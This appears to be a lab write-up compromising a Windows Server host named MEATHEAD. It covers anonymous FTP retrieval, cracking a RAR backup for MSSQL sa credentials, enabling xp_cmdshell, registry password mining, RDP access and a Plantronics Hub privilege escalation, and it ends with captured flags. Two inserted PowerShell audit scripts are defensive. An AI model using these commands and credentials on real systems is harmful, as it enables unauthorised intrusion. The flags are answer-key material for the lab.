Nmap Results
# Nmap 7.92 scan initiated Mon Aug 29 23:02:31 2022 as: nmap -T5 -p80,135,139,445,1221,1435,3389,5985 -A -oA scan-all -Pn 192.168.179.70
Nmap scan report for 192.168.179.70
Host is up (0.081s latency).
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Plantronics
| http-methods:
|_ Potentially risky methods: TRACE
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
1221/tcp open ftp Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 04-27-20 07:02PM 18866 Elementum Supremum.docx
| 04-27-20 07:02PM 764176 file_example_MP3_700KB.mp3
| 04-27-20 07:02PM 15690 img.jpg
| 04-27-20 07:02PM 302 MSSQL_BAK.rar
| 04-27-20 07:02PM 548 palindromes.txt
|_04-27-20 07:02PM 45369 server.jpg
| ftp-syst:
|_ SYST: Windows_NT
1435/tcp open ms-sql-s Microsoft SQL Server 2017 14.00.1000
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2022-08-28T05:05:51
|_Not valid after: 2052-08-28T05:05:51
|_ssl-date: 2022-08-30T03:03:59+00:00; 0s from scanner time.
| ms-sql-ntlm-info:
| Target_Name: MEATHEAD
| NetBIOS_Domain_Name: MEATHEAD
| NetBIOS_Computer_Name: MEATHEAD
| DNS_Domain_Name: Meathead
| DNS_Computer_Name: Meathead
|_ Product_Version: 10.0.17763
3389/tcp open ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: MEATHEAD
| NetBIOS_Domain_Name: MEATHEAD
| NetBIOS_Computer_Name: MEATHEAD
| DNS_Domain_Name: Meathead
| DNS_Computer_Name: Meathead
| Product_Version: 10.0.17763
|_ System_Time: 2022-08-30T03:03:19+00:00
| ssl-cert: Subject: commonName=Meathead
| Not valid before: 2022-08-27T05:05:45
|_Not valid after: 2023-02-26T05:05:45
|_ssl-date: 2022-08-30T03:03:59+00:00; 0s from scanner time.
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Timing level 5 (Insane) used
No OS matches for host
Network Distance: 2 hops
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-time:
| date: 2022-08-30T03:03:23
|_ start_date: N/A
TRACEROUTE (using port 3389/tcp)
HOP RTT ADDRESS
1 80.90 ms 192.168.49.1
2 81.25 ms 192.168.179.70
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Aug 29 23:04:00 2022 -- 1 IP address (1 host up) scanned in 89.54 seconds
Service Enumeration
TCP/139,445
Test for anonymous SMB enumeration.
TCP/1221
Test Anonymous FTP Access
Microsoft ftpd is running on this port. The nmap scan results show that anonymous logon is enabled.
Let's make a directory and store the files there. Connect to the FTP service on port 1221, log in as anonymous, and pull down everything in the listing.
mkdir ftp-files
ftp 192.168.179.70 1221
ftp> lcd ftp-files
ftp> prompt
ftp> mget *
Analyze the Files
MSSQL_BAK.rar
We can try to crack it with john by using the rar2john tool.
rar2john MSSQL_BAK.rar > hash.txt
john --wordlist=rockyou.txt hash.txt
Let's see if we can open the archive now. Looks like some database admin credentials, possibly: sa:EjectFrailtyThorn425.
TCP/80
I don't recognise the icon on this page, but the URL for the image is http://192.168.179.70/images/plt-hub-orange.png. I search Google for the Plantronics Hub logo and get a match.
I check searchsploit for anything related to this product.
searchsploit plantronics
Looks like there are some privilege escalation possibilities to keep in our pocket for later.
Plantronics Hub 3.13.2 - Local Privilege Escalation | windows/local/47845.txt
Plantronics Hub 3.13.2 - SpokesUpdateService Privilege Escalation (M | windows/local/47944.rb
Gobuster Enumeration
gobuster dir -u http://192.168.179.70/ -w /usr/share/seclists/Discovery/Web-Content/big.txt -x aspx,asp,html -r -o gobuster80.txt
Nothing interesting with the gobuster enumeration.
TCP/1435
The nmap scan identifies this as Microsoft SQL Server 2017 14.00.1000. Now that we have DB credentials from the backup file, let's use Impacket's mssqlclient.py to connect to the database and see what we can do.
mssqlclient.py -port 1435 'sa:EjectFrailtyThorn425@192.168.179.70'
Once we're connected, we can run enable_xp_cmdshell to allow command execution (I found it was disabled when I first tested the client connection).
SQL> help
SQL> enable_xp_cmdshell
SQL> RECONFIGURE
SQL> xp_cmdshell whoami
Exploit
Details
The path to code execution on the host went as follows:
- Anonymous login to the FTP server allowed retrieval of an MSSQL backup
- The backup was compressed in a password-protected .rar archive with a crackable password
- Given the credentials in the backup file, we can execute arbitrary commands on the host
Gaining a Foothold
Enable XP_CMDSHELL
We can use Impacket's mssqlclient.py script to connect to the MSSQL server. Then, we'll need to enable xp_cmdshell to run commands on the host.
mssqlclient.py -port 1435 'sa:EjectFrailtyThorn425@192.168.179.70'
SQL> enable_xp_cmdshell
SQL> EXEC xp_cmdshell 'whoami'
SQL> EXEC xp_cmdshell 'ipconfig'
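The foothold above rests on two server settings: the sa login accepting a password, and xp_cmdshell being switchable on by a sysadmin. This added PowerShell audit, not part of the original write-up, reads both back from an instance and optionally reverts them; it assumes the caller's Windows login is sysadmin, and the 'localhost,1435' endpoint is a placeholder.

```powershell
# Added example (not from the write-up): report whether xp_cmdshell is enabled
# and whether the 'sa' login can still authenticate by password.
# Assumes the caller's Windows login is sysadmin; the endpoint is a placeholder.
param(
    [string]$Server = 'localhost,1435',
    [switch]$Remediate   # also disable xp_cmdshell and the sa login
)

$conn = New-Object System.Data.SqlClient.SqlConnection
$conn.ConnectionString = "Server=$Server;Integrated Security=True;Encrypt=True;TrustServerCertificate=True"
$conn.Open()

function Invoke-Sql([string]$Sql) {
    $cmd = $conn.CreateCommand()
    $cmd.CommandText = $Sql
    $table = New-Object System.Data.DataTable
    [void](New-Object System.Data.SqlClient.SqlDataAdapter $cmd).Fill($table)
    return $table.Rows
}

$findings = @()

# xp_cmdshell: value_in_use = 1 means any sysadmin login can run OS commands,
# which is exactly the step taken above right after logging in as sa.
foreach ($row in Invoke-Sql "SELECT CONVERT(int, value_in_use) AS v FROM sys.configurations WHERE name = 'xp_cmdshell'") {
    if ($row.v -eq 1) { $findings += 'xp_cmdshell is enabled' }
}

# sa: sid 0x01 is always the sa login even if renamed. With mixed-mode auth and
# sa enabled, a leaked or cracked password (as in the recovered backup) is a full takeover.
$saName = 'sa'
foreach ($row in Invoke-Sql "SELECT name, is_disabled, CONVERT(int, SERVERPROPERTY('IsIntegratedSecurityOnly')) AS winonly FROM sys.sql_logins WHERE sid = 0x01") {
    $saName = $row.name
    if (-not $row.is_disabled) { $findings += "login '$saName' (sa) is enabled" }
    if ($row.winonly -eq 0)    { $findings += 'mixed-mode authentication allows password logins' }
}

if ($Remediate) {
    # xp_cmdshell is an advanced option, so it must be exposed before it can be set.
    [void](Invoke-Sql "EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 0; RECONFIGURE; EXEC sp_configure 'show advanced options', 0; RECONFIGURE;")
    [void](Invoke-Sql "ALTER LOGIN [$saName] DISABLE;")
}

$conn.Close()
if ($findings.Count -eq 0) { 'No findings.' } else { $findings | ForEach-Object { "FINDING: $_" } }
```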
No Reverse Shell
I spent far too long trying a mix of different delivery mechanisms and payload types to get a reverse shell on the target. I tried delivering with:
- smbserver.py
- Python web server
And I verified the payloads made it onto the target. But no matter what I tried (encodings, scripts, binaries), nothing worked, which was frustrating to say the least.
Password Mining
I had a look around the file system for configuration files that might contain a password, but no luck. So, I turned to the registry. My first registry search returned nothing.
EXEC xp_cmdshell 'reg query HKLM\SYSTEM /f password /t REG_SZ /s'
However, this search produced an interesting find.
EXEC xp_cmdshell 'reg query HKLM\SYSTEM /f pass /t REG_SZ /s'
Now, if we look at the output of the net user command, we can infer that this is either Administrator's or jane's password. We can test the password with smbclient.
Jane doesn't have access to either of these privileged shares, but we do know her password and RDP is open on this host.
xfreerdp /v:'192.168.179.70' /u:'jane' /p:'TwilightAirmailMuck234'
Post-Exploit Enumeration
Operating Environment
OS & Kernel
Host Name: MEATHEAD
OS Name: Microsoft Windows Server 2019 Standard
OS Version: 10.0.17763 N/A Build 17763
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Server
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 00429-70000-00000-AA207
Original Install Date: 4/27/2020, 9:52:21 PM
System Boot Time: 8/28/2022, 5:05:34 AM
System Manufacturer: VMware, Inc.
System Model: VMware7,1
System Type: x64-based PC
Processor(s): 1 Processor(s) Installed.
[01]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~3094 Mhz
BIOS Version: VMware, Inc. VMW71.00V.18227214.B64.2106252220, 6/25/2021
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume2
System Locale: en-us;English (United States)
Input Locale: en-us;English (United States)
Time Zone: (UTC) Coordinated Universal Time
Total Physical Memory: 4,095 MB
Available Physical Memory: 2,053 MB
Virtual Memory: Max Size: 4,799 MB
Virtual Memory: Available: 2,765 MB
Virtual Memory: In Use: 2,034 MB
Page File Location(s): C:\pagefile.sys
Domain: WORKGROUP
Logon Server: \\MEATHEAD
Hotfix(s): 7 Hotfix(s) Installed.
[01]: KB4552924
[02]: KB4462930
[03]: KB4494174
[04]: KB4512577
[05]: KB4537759
[06]: KB4549947
[07]: KB4551853
Network Card(s): 1 NIC(s) Installed.
[01]: vmxnet3 Ethernet Adapter
Connection Name: Ethernet0
DHCP Enabled: No
IP address(es)
[01]: 192.168.179.70
Hyper-V Requirements: A hypervisor has been detected. Features required for Hyper-V will not be displayed.
Current User
USER INFORMATION
----------------
User Name SID
============= =============================================
meathead\jane S-1-5-21-4244463105-466391970-2126029592-1000
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
====================================== ================ ============ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Desktop Users Alias S-1-5-32-555 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\REMOTE INTERACTIVE LOGON Well-known group S-1-5-14 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\INTERACTIVE Well-known group S-1-5-4 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account Well-known group S-1-5-113 Mandatory group, Enabled by default, Enabled group
LOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level Label S-1-16-8192
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== ========
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
Users and Groups
Local Users
User accounts for \\MEATHEAD
-------------------------------------------------------------------------------
Administrator DefaultAccount Guest
jane WDAGUtilityAccount
Local Groups
Aliases for \\MEATHEAD
-------------------------------------------------------------------------------
*Access Control Assistance Operators
*Administrators
*Backup Operators
*Certificate Service DCOM Access
*Cryptographic Operators
*Device Owners
*Distributed COM Users
*Event Log Readers
*Guests
*Hyper-V Administrators
*IIS_IUSRS
*Network Configuration Operators
*Performance Log Users
*Performance Monitor Users
*Power Users
*Print Operators
*RDS Endpoint Servers
*RDS Management Servers
*RDS Remote Access Servers
*Remote Desktop Users
*Remote Management Users
*Replicator
*SQLServer2005SQLBrowserUser$WIN-OHNBE5J07GP
*Storage Replica Administrators
*System Managed Accounts Group
*Users
Network Configurations
Interfaces
Windows IP Configuration
Ethernet adapter Ethernet0:
Connection-specific DNS Suffix . :
IPv4 Address. . . . . . . . . . . : 192.168.179.70
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.179.254
Open Ports
TCP 0.0.0.0:80 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:135 0.0.0.0:0 LISTENING 852
TCP 0.0.0.0:445 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:1221 0.0.0.0:0 LISTENING 2328
TCP 0.0.0.0:1435 0.0.0.0:0 LISTENING 3424
TCP 0.0.0.0:3389 0.0.0.0:0 LISTENING 1008
TCP 0.0.0.0:5985 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:47001 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:49664 0.0.0.0:0 LISTENING 484
TCP 0.0.0.0:49665 0.0.0.0:0 LISTENING 1060
TCP 0.0.0.0:49666 0.0.0.0:0 LISTENING 1348
TCP 0.0.0.0:49667 0.0.0.0:0 LISTENING 2044
TCP 0.0.0.0:49668 0.0.0.0:0 LISTENING 2264
TCP 0.0.0.0:49669 0.0.0.0:0 LISTENING 604
TCP 0.0.0.0:49670 0.0.0.0:0 LISTENING 616
TCP 127.0.0.1:32017 0.0.0.0:0 LISTENING 6360
TCP 127.0.0.1:32018 0.0.0.0:0 LISTENING 6360
TCP 192.168.179.70:139 0.0.0.0:0 LISTENING 4
TCP [::]:80 [::]:0 LISTENING 4
TCP [::]:135 [::]:0 LISTENING 852
TCP [::]:445 [::]:0 LISTENING 4
TCP [::]:1221 [::]:0 LISTENING 2328
TCP [::]:1435 [::]:0 LISTENING 3424
TCP [::]:3389 [::]:0 LISTENING 1008
TCP [::]:5985 [::]:0 LISTENING 4
TCP [::]:47001 [::]:0 LISTENING 4
TCP [::]:49664 [::]:0 LISTENING 484
TCP [::]:49665 [::]:0 LISTENING 1060
TCP [::]:49666 [::]:0 LISTENING 1348
TCP [::]:49667 [::]:0 LISTENING 2044
TCP [::]:49668 [::]:0 LISTENING 2264
TCP [::]:49669 [::]:0 LISTENING 604
TCP [::]:49670 [::]:0 LISTENING 616
Privilege Escalation
Writable Privileged Directory
Using the information found in my earlier service enumeration, we know that the installed version of Plantronics Hub is vulnerable to a local privilege escalation exploit. Copy the exploit to your working directory and have a look over the exploit details.
searchsploit -m 47845
less 47845.txt
You'll note that the exploit tells us to place a MajorUpgrade.config file in C:\ProgramData\Plantronics\Spokes3G, with a crafted payload in the configuration file. Let's double check the ACL on the directory.
Indeed, it looks like BUILTIN\Users, an unprivileged group, has write access to a directory it shouldn't.
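The ACL review described above, generalised to a whole directory tree, as an added PowerShell check that is not the author's script: it flags every access entry that gives a low-privilege principal write rights under a root. The principal list is an assumption; the default root is the directory the advisory names.

```powershell
# Added example (not the write-up's own script): list ACEs that let an
# unprivileged principal write into a directory that a privileged service reads.
# The principal list is an assumption; the default root is the directory named
# in the Plantronics Hub advisory.
param(
    [string]$Root = 'C:\ProgramData\Plantronics\Spokes3G',
    [string[]]$LowPriv = @('BUILTIN\Users', 'Everyone', 'NT AUTHORITY\Authenticated Users', 'NT AUTHORITY\INTERACTIVE')
)

# Any of these rights lets a standard user create, replace or remove a file there.
$WriteBits = [int]([System.Security.AccessControl.FileSystemRights]::WriteData -bor
                   [System.Security.AccessControl.FileSystemRights]::AppendData -bor
                   [System.Security.AccessControl.FileSystemRights]::Delete -bor
                   [System.Security.AccessControl.FileSystemRights]::DeleteSubdirectoriesAndFiles -bor
                   [System.Security.AccessControl.FileSystemRights]::ChangePermissions -bor
                   [System.Security.AccessControl.FileSystemRights]::TakeOwnership)
# Inherit-only ACEs often carry generic rights that Get-Acl leaves as raw bits.
$GenericAll = 0x10000000; $GenericWrite = 0x40000000

function Test-WritableAce {
    param([System.Security.AccessControl.FileSystemAccessRule]$Ace)
    if ($Ace.AccessControlType -ne 'Allow') { return $false }
    if ($LowPriv -notcontains $Ace.IdentityReference.Value) { return $false }
    $r = [int]$Ace.FileSystemRights
    return (($r -band $WriteBits) -ne 0) -or (($r -band $GenericAll) -ne 0) -or (($r -band $GenericWrite) -ne 0)
}

$dirs = @(Get-Item -LiteralPath $Root -ErrorAction Stop) +
        @(Get-ChildItem -LiteralPath $Root -Directory -Recurse -ErrorAction SilentlyContinue)

$results = foreach ($d in $dirs) {
    $acl = Get-Acl -LiteralPath $d.FullName -ErrorAction SilentlyContinue
    if (-not $acl) { continue }
    foreach ($ace in $acl.Access) {
        if (Test-WritableAce $ace) {
            [pscustomobject]@{ Path = $d.FullName; Identity = $ace.IdentityReference.Value
                               Rights = $ace.FileSystemRights; Inherited = $ace.IsInherited }
        }
    }
}

if ($results) { $results | Format-Table -AutoSize; exit 1 }
"No low-privilege write access under $Root"; exit 0
```

A non-zero exit code makes the check usable from a scheduled task or configuration pipeline; the Inherited column shows whether the weak entry was set on the directory itself or came down from ProgramData.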
Execute the Exploit
I wrote a PowerShell script to automate the process. When I tried running the commands individually, the file would be deleted too quickly and a SYSTEM shell would not spawn. So, I wrote a script that holds the file open while the payload is written to it and then spawns the shell. Usage examples are provided in the repo.
Download the script file to the target and run the script.
Flags
C:\users\jane\Desktop\local.txt
32d5ddc986de6979a730ef057c17df82
C:\users\Administrator\Desktop\local.txt
7ab84514f5dff5f19ec54f23b6b4bfc7